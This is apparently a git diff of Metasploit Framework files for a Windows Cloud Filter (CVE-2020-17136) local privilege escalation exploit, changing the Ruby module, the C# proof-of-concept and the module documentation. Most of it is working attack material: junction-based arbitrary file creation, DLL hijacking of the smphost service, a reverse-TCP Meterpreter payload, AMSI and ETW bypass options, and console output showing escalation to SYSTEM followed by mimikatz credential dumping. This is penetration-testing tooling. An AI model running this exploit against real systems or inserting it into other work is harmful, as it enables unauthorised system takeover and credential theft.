diff --git a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe index e1690507c2..16cb8809c1 100644 Binary files a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe and b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe differ diff --git a/documentation/modules/exploit/windows/local/cve_2020_17136.md b/documentation/modules/exploit/windows/local/cve_2020_17136.md index 5e2011b31a..3833ecd351 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_17136.md +++ b/documentation/modules/exploit/windows/local/cve_2020_17136.md @@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage -Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module -then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process, -thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user. +Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are +strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will +allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using +Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate +the `SYSTEM` user. ### Installation And Setup `cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later. ## Verification Steps 1. Start msfconsole - 2. Get a meterpreter shell as a low privileged user. + 2. Get a shell as a low privileged user. 3. **Verify** that `getsystem` does not get you a `SYSTEM` shell. 4. `use exploit/windows/local/cve_2020_17136` 5. `set session *session id*` 6. `run` - 7. **Verify** that you get a new shell as the `SYSTEM` user + 7. **Verify** that you get a new shell as the `N` user ## Options @@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run [*] Started bind TCP handler against 172.22.152.177:4444 [*] Sending stage (200262 bytes) to 172.22.152.177 -[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600 +[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600 meterpreter > getuid Server username: DESKTOP-KUO5CML\normal @@ -60,14 +62,6 @@ SeShutdownPrivilege SeTimeZonePrivilege SeUndockPrivilege -meterpreter > sysinfo -Computer : DESKTOP-KUO5CML -OS : Windows 10 (10.0 Build 19041). -Architecture : x64 -System Language : en_US -Domain : WORKGROUP -Logged On Users : 5 -Meterpreter : x64/windows meterpreter > getsystem [-] 2001: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) @@ -78,16 +72,20 @@ meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136 [*] Using configured payload windows/x64/meterpreter/reverse_tcp +msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 +SESSION => 1 +msf6 exploit(windows/local/cve_2020_17136) > check +[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected! msf6 exploit(windows/local/cve_2020_17136) > show options Module options (exploit/windows/local/cve_2020_17136): - Name Current Setting Required Description - ---- --------------- -------- ----------- - AMSIBYPASS true yes Enable Amsi bypass - ETWBYPASS true yes Enable Etw bypass - SESSION yes The session to run this module on. - WAIT 5 no Time in seconds to wait + Name Current Setting Required Description + ---- --------------- -------- ----------- + AMSIBYPASS true yes Enable Amsi bypass + ETWBYPASS true yes Enable Etw bypass + SESSION 1 yes The session to run this module on. + WAIT 5 no Time in seconds to wait Payload options (windows/x64/meterpreter/reverse_tcp): @@ -106,36 +104,52 @@ Exploit target: 0 Windows DLL Dropper -msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 -SESSION => 1 msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28 LHOST => 172.22.159.28 -msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688 -LPORT => 6688 msf6 exploit(windows/local/cve_2020_17136) > run -[*] Started reverse TCP handler on 172.22.159.28:6688 +[*] Started reverse TCP handler on 172.22.159.28:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected! -[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup... +[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup... [*] Running module against DESKTOP-KUO5CML [*] Launching notepad.exe to host CLR... -[+] Process 7784 launched. -[*] Reflectively injecting the Host DLL into 7784.. -[*] Injecting Host into 7784... -[*] Host injected. Copy assembly into 7784... +[+] Process 100 launched. +[*] Reflectively injecting the Host DLL into 100.. +[*] Injecting Host into 100... +[*] Host injected. Copy assembly into 100... [*] Assembly copied. [*] Executing... [*] Start reading output -[+] Key: 1821285265184 +[+] Sync connection key: 2733760425760 [+] Done [*] End output. [+] Execution finished. [*] Sending stage (200262 bytes) to 172.22.152.177 -[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600 -[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem' -[+] Obtained SYSTEM via technique 4 +[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600 +meterpreter > getuid +Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > getprivs + +Enabled Process Privileges +========================== + +Name +---- +SeAssignPrimaryTokenPrivilege +SeAuditPrivilege +SeChangeNotifyPrivilege +SeCreateGlobalPrivilege +SeImpersonatePrivilege +SeIncreaseQuotaPrivilege +SeIncreaseWorkingSetPrivilege +SeShutdownPrivilege +SeTimeZonePrivilege +SeUndockPrivilege + +meterpreter > getsystem +...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getprivs @@ -157,7 +171,7 @@ SeTimeZonePrivilege SeUndockPrivilege meterpreter > load kiwi -Loading extension kiwi...cre +Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) @@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null) test DESKTOP-KUO5CML (null) -meterpreter > background -[*] Backgrounding session 2... +meterpreter > +Background session 2? [y/N] msf6 exploit(windows/local/cve_2020_17136) > sessions Active sessions @@ -208,7 +222,7 @@ Active sessions Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177) - 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177) + 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177) msf6 exploit(windows/local/cve_2020_17136) > ``` diff --git a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs index 7de30bd608..ff88ee6350 100644 --- a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs +++ b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs @@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check(); try { - Console.WriteLine("Key: {0}", key); + Console.WriteLine("Sync connection key: {0}", key); CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1]; place_holders[0].RelativeFileName = FilePath; CF_FS_METADATA meta_data = new CF_FS_METADATA diff --git a/modules/exploits/windows/local/cve_2020_17136.rb b/modules/exploits/windows/local/cve_2020_17136.rb index 23aa3f8e05..af86453a7d 100644 --- a/modules/exploits/windows/local/cve_2020_17136.rb +++ b/modules/exploits/windows/local/cve_2020_17136.rb @@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Dotnet include Msf::Post::Windows::Services + include Msf::Post::Windows::FileSystem include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck @@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP', 'Description' => %q{ - The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, - did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling - FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker - controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any - security checks that would otherwise prevent a normal user from being able to create files in directories + The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December + 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when + calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() + function with attacker controlled input. This meant that files were created with + KernelMode permissions, thereby bypassing any security checks that would otherwise + prevent a normal user from being able to create files in directories they don't have permissions to create files in. - This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage - Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module - then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process, - thereby allowing the attacker to execute arbitrary code as the SYSTEM user. + This module abuses this vulnerability to perform a DLL hijacking attack against the + Microsoft Storage Spaces SMP service, which grants the attacker code execution as the + NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one + of the Meterpreter payloads, as doing so will allow them to subsequently escalate their + new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command + to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Privileged' => true, - 'Arch' => [ARCH_X86, ARCH_X64], + 'Arch' => [ARCH_X64], 'Targets' => [ [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ], @@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local { 'EXITFUNC' => 'process', 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', - 'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem' } ) ) @@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local ) end - def find_required_clr(exe_path) - filecontent = File.read(exe_path).bytes - sign = 'v4.0.30319'.bytes - filecontent.each_with_index do |_item, index| - sign.each_with_index do |subitem, indexsub| - break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16) - - if indexsub == 9 - vprint_status('CLR version required: v4.0.30319') - return 'v4.0.30319' - end - end - end - vprint_status('CLR version required: v2.0.50727') - 'v2.0.50727' - end - def check_requirements(clr_req, installed_dotnet_versions) installed_dotnet_versions.each do |fi| if clr_req == 'v4.0.30319' @@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local def check sysinfo_value = sysinfo['OS'] - if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') @@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local def exploit if sysinfo['Architecture'] != 'x64' fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!') + elsif session.arch != 'x64' + fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!') end dir_junct_path = 'C:\\Windows\\Temp' intermediate_dir = rand_text_alpha(10).to_s junction_dir = rand_text_alpha(10).to_s + path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}" - cd(dir_junct_path) - mkdir(intermediate_dir) - if !directory?("#{dir_junct_path}\\#{intermediate_dir}") + mkdir("#{path_to_intermediate_dir}") + if !directory?("#{path_to_intermediate_dir}") fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!') end - register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}") + register_dir_for_cleanup("#{path_to_intermediate_dir}") - cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"") - if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}") - fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!') + mkdir("#{path_to_intermediate_dir}\\#{junction_dir}") + if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}") + fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!') + end + + mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\') + if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}") + fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!') end - register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}") exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe' unless File.file?(exe_path) @@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local if installed_dotnet_versions == [] fail_with(Failure::BadConfig, 'Target has no .NET framework installed') end - rclr = find_required_clr(exe_path) - if check_requirements(rclr, installed_dotnet_versions) == false + if check_requirements('v4.0.30319', installed_dotnet_versions) == false fail_with(Failure::BadConfig, 'CLR required for assembly not installed') end payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll" print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...") write_file(payload_path, generate_payload_dll) register_file_for_cleanup(payload_path) - execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}") + execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}") service_start('smphost') register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll') + sleep(3) + delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle) end def pid_exists(pid)